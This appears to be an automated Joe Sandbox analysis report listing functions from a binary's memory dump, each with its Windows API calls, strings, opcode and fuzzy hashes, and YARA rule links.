                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseValue$CreateDeleteOpen
                                                                                      • String ID: %s=%s$\Shell\Open\Command
                                                                                      • API String ID: 4081037667-3301834661
                                                                                      • Opcode ID: 95367a666dc1e10ecfff189f591a6456c9e88ca4fe6cad7e4a3eb832a6d246c2
                                                                                      • Instruction ID: c85f29e33077a8ae4b0a206c57708b77cc62c0eebc171386298c5fff59c74b30
                                                                                      • Opcode Fuzzy Hash: 95367a666dc1e10ecfff189f591a6456c9e88ca4fe6cad7e4a3eb832a6d246c2
                                                                                      • Instruction Fuzzy Hash: B371A6B1B09B4282FAF06B35A0A02B9E299FF4D759FC44131DA4E27794DF3CD5458722
                                                                                      Function 00007FF79376AA30 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 123registryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • RegCreateKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF79376AA85
                                                                                      • RegSetValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF79376AACF
                                                                                      • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF79376AAEC
                                                                                      • RegDeleteKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF7937698C0), ref: 00007FF79376AB39
                                                                                      • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF7937698C0), ref: 00007FF79376AB6F
                                                                                      • RegDeleteValueW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF7937698C0), ref: 00007FF79376ABA4
                                                                                      • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF7937698C0), ref: 00007FF79376ABCB
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseDeleteValue$CreateOpen
                                                                                      • String ID: %s=%s
                                                                                      • API String ID: 1019019434-1087296587
                                                                                      • Opcode ID: 72247b027dceff1e1530fc5cf8e528a5709370e20d618e6d58b54cd87f2ef8dd
                                                                                      • Instruction ID: 7a0b687676b13c6bc2408c195fd844c6ad639bdde394fdf910cd73ad87508b4d
                                                                                      • Opcode Fuzzy Hash: 72247b027dceff1e1530fc5cf8e528a5709370e20d618e6d58b54cd87f2ef8dd
                                                                                      • Instruction Fuzzy Hash: 47519271B08B8286F7F0AB35A49476AF6A9FB8D785F848235CA4D53790DF38D4418B21
                                                                                      Function 00007FF793741884 Relevance: 10.9, APIs: 5, Strings: 1, Instructions: 380COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: _wcsnicmpwcsrchr
                                                                                      • String ID: COPYCMD
                                                                                      • API String ID: 2429825313-3727491224
                                                                                      • Opcode ID: 4d82711cc2208d1db92bdbc9a67415b50588ed216ffaf236914d612e0490fdc8
                                                                                      • Instruction ID: 0f49e07b447f92b0ccabdd9ae49eddcaa90ef7d20f2cd443f013990cffafee3f
                                                                                      • Opcode Fuzzy Hash: 4d82711cc2208d1db92bdbc9a67415b50588ed216ffaf236914d612e0490fdc8
                                                                                      • Instruction Fuzzy Hash: DEF19322F0C64286FBB0BF7190D41BDA6AAAB0D798F804235DE5E336D4DE3CA551C761
                                                                                      Function 00007FF793744A30 Relevance: 10.8, APIs: 7, Instructions: 318COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: memset$FullNamePathwcsrchr
                                                                                      • String ID:
                                                                                      • API String ID: 4289998964-0
                                                                                      • Opcode ID: ca4f6fec6d1e45853bca55d284d940f9823b5f813051b5de8d9b268dc279a2c6
                                                                                      • Instruction ID: afd4bbec3987b32156c2e3564cd082da50496a8e9a4a61a2387741423cf30f38
                                                                                      • Opcode Fuzzy Hash: ca4f6fec6d1e45853bca55d284d940f9823b5f813051b5de8d9b268dc279a2c6
                                                                                      • Instruction Fuzzy Hash: F9C1D321B0974682FAF4BB61D5A8379A3A9FB49B94F805535CE0E23BD0DF3CB4518721
                                                                                      Function 00007FF79376BCF0 Relevance: 10.6, APIs: 7, Instructions: 52filenativeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: ExclusiveLock$AcquireBufferCancelConsoleFileFlushInputReleaseSynchronous_get_osfhandlefflushfprintf
                                                                                      • String ID:
                                                                                      • API String ID: 3476366620-0
                                                                                      • Opcode ID: 6372b5247c68ad753e8b139ca81a5779740cabb9e500d40167355afd769c266a
                                                                                      • Instruction ID: cdc1dc0ad6f2ad139372249e686a0d83d402bd3af73a861a8234750e8de69f42
                                                                                      • Opcode Fuzzy Hash: 6372b5247c68ad753e8b139ca81a5779740cabb9e500d40167355afd769c266a
                                                                                      • Instruction Fuzzy Hash: 89212C20908E4296FAB47B3194952B8E6A9FF4E716FC44235C51E763E2DF3CA5058721
                                                                                      Function 00007FF793743D94 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 110nativeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: InformationProcess$CurrentDirectoryQuery_setjmp_wcsnicmpwcsrchr
                                                                                      • String ID: %9d
                                                                                      • API String ID: 1006866328-2241623522
                                                                                      • Opcode ID: 62d65c6c863574456e8a18a26f120651995e0feaf5acd41ec6a68f480e3dc1f6
                                                                                      • Instruction ID: 6cc7a72e0eaf882d23c485a1ee43cd169a1057de075b5abd364f400e3ac8c1ca
                                                                                      • Opcode Fuzzy Hash: 62d65c6c863574456e8a18a26f120651995e0feaf5acd41ec6a68f480e3dc1f6
                                                                                      • Instruction Fuzzy Hash: 58515471A086429AF7A0AF31D8C45A9BBB8FB48764F804635D96D63795CF3CE904CB20
                                                                                      Function 00007FF793748DF8 Relevance: 7.8, APIs: 5, Instructions: 281COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: memset
                                                                                      • String ID:
                                                                                      • API String ID: 2221118986-0
                                                                                      • Opcode ID: 4ec132db5a5163512eeab285e6cca4fd0bb6ff7b6cd64baaaa3bea2245e3dd05
                                                                                      • Instruction ID: ed92fd6246142c3ac660be14d400e5292272be5bc89bb8397acd7f27979f6731
                                                                                      • Opcode Fuzzy Hash: 4ec132db5a5163512eeab285e6cca4fd0bb6ff7b6cd64baaaa3bea2245e3dd05
                                                                                      • Instruction Fuzzy Hash: 7AC1E622A0978696FBB5EB31E8D4AB9A3AAFB59784F844131DA0D57790DF3CE540C310
                                                                                      Function 00007FF793749B50 Relevance: 7.8, APIs: 5, Instructions: 252COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: Heap$AllocProcess
                                                                                      • String ID:
                                                                                      • API String ID: 1617791916-0
                                                                                      • Opcode ID: 3743209a10b96ebcc181eebe11116311313ddf8ce3d63fdcd25b8e532d2a8f02
                                                                                      • Instruction ID: c2a282afcf74806ef2661e3f94be221c3685c2d533af2c76fc701539b355ab79
                                                                                      • Opcode Fuzzy Hash: 3743209a10b96ebcc181eebe11116311313ddf8ce3d63fdcd25b8e532d2a8f02
                                                                                      • Instruction Fuzzy Hash: 8DA19321A1865282FBB4AB36A4D5679A6EAFF8DB90F804135DD4E63791DF3CF401C720
                                                                                      Function 00007FF79376FB54 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 112COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: memset$DiskFreeSpace
                                                                                      • String ID: %5lu
                                                                                      • API String ID: 2448137811-2100233843
                                                                                      • Opcode ID: a32004ad0b0cd9a1642accdea686924f5f32727604a55ba99b3828265f09f6cb
                                                                                      • Instruction ID: c8b7c6a5940f731fd41d30782d7f68757458e2546aec54b3745a69cc9919b4fe
                                                                                      • Opcode Fuzzy Hash: a32004ad0b0cd9a1642accdea686924f5f32727604a55ba99b3828265f09f6cb
                                                                                      • Instruction Fuzzy Hash: 2641B422708AC195EBB1EF21E8946EAB365FB88788F808031DA4D5B758DF7CD549C710
                                                                                      Function 00007FF79374D250 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 187COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: _wcsicmp
                                                                                      • String ID: GeToken: (%x) '%s'
                                                                                      • API String ID: 2081463915-1994581435
                                                                                      • Opcode ID: fe18cb0ed8500a4f68af4489c4d2b16fbbaa9a87b1c7dbde9da4f66a5e2be525
                                                                                      • Instruction ID: 82530fca9546092658036676f356ec077950cc51357df1ba19ac06d80b6406d9
                                                                                      • Opcode Fuzzy Hash: fe18cb0ed8500a4f68af4489c4d2b16fbbaa9a87b1c7dbde9da4f66a5e2be525
                                                                                      • Instruction Fuzzy Hash: B171BF20E0C25385FBF4BB79A4C8275A6AAAF0D764FC40535D54E62AE1DF3CF4818321
                                                                                      Function 00007FF7937481D4 Relevance: 4.8, APIs: 3, Instructions: 299COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: wcschr
                                                                                      • String ID:
                                                                                      • API String ID: 1497570035-0
                                                                                      • Opcode ID: e0e39bf442d6dcfd9436b6d2842294aeb06884c7ddad4889aba3c1e8f15d8aa4
                                                                                      • Instruction ID: 265351eec69d8c0e590af49739883458e769defa0bdd82a6285a24b6687ec51f
                                                                                      • Opcode Fuzzy Hash: e0e39bf442d6dcfd9436b6d2842294aeb06884c7ddad4889aba3c1e8f15d8aa4
                                                                                      • Instruction Fuzzy Hash: AAC10721A0864282FAF4BB35A4D4279E7A9FF8D794F844136DA5E676D5DE3CF8008720
                                                                                      Function 00007FF793767B4C Relevance: 4.8, APIs: 3, Instructions: 269fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: Find$File$CloseFirstNext
                                                                                      • String ID:
                                                                                      • API String ID: 3541575487-0
                                                                                      • Opcode ID: 56e533f62de2e302ba9a5b3475642777aff6c12fc228326da18867365cac5796
                                                                                      • Instruction ID: 43ae75f9a53f58e7e15480bbf04fa3cc25a19525545072ed6fe0984f8cd2b059
                                                                                      • Opcode Fuzzy Hash: 56e533f62de2e302ba9a5b3475642777aff6c12fc228326da18867365cac5796
                                                                                      • Instruction Fuzzy Hash: D5A11821B18A9251EEB4BB7594A427DE395AF4DBE8FC44235DE6E677C4EE3CE4008310
                                                                                      Function 00007FF793746BE0 Relevance: 4.7, APIs: 3, Instructions: 184COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00007FF79374CD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF79374B9A1,?,?,?,?,00007FF79374D81A), ref: 00007FF79374CDA6
                                                                                        • Part of subcall function 00007FF79374CD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF79374B9A1,?,?,?,?,00007FF79374D81A), ref: 00007FF79374CDBD
                                                                                      • _pipe.MSVCRT ref: 00007FF793746C1E
                                                                                      • _get_osfhandle.MSVCRT ref: 00007FF793746CD1
                                                                                      • DuplicateHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 00007FF793746CFB
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: Heapwcschr$AllocDuplicateHandleProcess_dup_dup2_get_osfhandle_pipe_wcsicmpmemset
                                                                                      • String ID:
                                                                                      • API String ID: 624391571-0
                                                                                      • Opcode ID: 47eda0b50bd71a54bf69730aae11c552028e8b9e5938e1f45885d11fc8581733
                                                                                      • Instruction ID: 5922d2f56f03b07fea6bc7ae6dc61dc1bc0f92c9bc5ea35ef83fb78590a85b0b
                                                                                      • Opcode Fuzzy Hash: 47eda0b50bd71a54bf69730aae11c552028e8b9e5938e1f45885d11fc8581733
                                                                                      • Instruction Fuzzy Hash: 38717E31A0860287F7A4BF35D8D4079B6AAEF8C764F948234D65D662D5CF3CF8528B21
                                                                                      Function 00007FF7937663FC Relevance: 4.7, APIs: 3, Instructions: 179threadCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: CurrentDebugDebuggerOutputPresentStringThread
                                                                                      • String ID:
                                                                                      • API String ID: 4268342597-0
                                                                                      • Opcode ID: dd079414f8549339cb4fded4247a4dbae90aea18fcb15bc8c39707241a1b23ff
                                                                                      • Instruction ID: c6304ebdecaf52c6c0a99f278fdc18ae448a113ab4918d4f4b9e15ecdbedf52f
                                                                                      • Opcode Fuzzy Hash: dd079414f8549339cb4fded4247a4dbae90aea18fcb15bc8c39707241a1b23ff
                                                                                      • Instruction Fuzzy Hash: 64812231A08B8291FAB4AF35A490239B7A8FB4DB88FD84139C94D63755DF7CE841C761
                                                                                      Function 00007FF7937588C0 Relevance: 4.6, APIs: 3, Instructions: 68nativethreadCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: OpenToken$CloseProcessThread
                                                                                      • String ID:
                                                                                      • API String ID: 2991381754-0
                                                                                      • Opcode ID: 4ce3de64b8687a78417f54647f77f6de0b0f09df9b2bc4953d3ae018d63077cb
                                                                                      • Instruction ID: 57ce1438a3654b15291fb2250f67bc6d06079ecdbeeffcf2b91c2586678abb16
                                                                                      • Opcode Fuzzy Hash: 4ce3de64b8687a78417f54647f77f6de0b0f09df9b2bc4953d3ae018d63077cb
                                                                                      • Instruction Fuzzy Hash: 3721E672B086829BE7A4AB60D4802BDF764EB89771F804136DB4A63784DF7CD848CB10
                                                                                      Function 00007FF79374586C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 25COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetVersion.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,?,?,?,?,00000000,00007FF79376C59E), ref: 00007FF793745879
                                                                                        • Part of subcall function 00007FF7937458D4: RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF793745903
                                                                                        • Part of subcall function 00007FF7937458D4: RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF793745943
                                                                                        • Part of subcall function 00007FF7937458D4: RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF793745956
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
